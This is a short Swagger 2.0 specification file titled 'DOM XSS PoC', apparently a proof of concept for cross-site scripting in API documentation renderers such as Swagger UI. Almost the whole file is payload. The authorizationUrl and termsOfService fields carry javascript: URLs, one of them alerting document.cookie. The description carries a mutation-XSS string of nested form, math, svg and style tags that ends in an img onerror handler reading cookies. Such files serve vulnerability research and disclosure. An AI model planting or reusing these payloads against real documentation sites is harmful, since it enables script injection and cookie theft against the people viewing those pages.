swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert("magdy")//
info:
  version: "0.0.1"
  title: DOM XSS PoC
  description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
  termsOfService: "javascript:alert(document.cookie)"
paths:
  /:
    get:
      responses:
        200:
          description: Echo GET
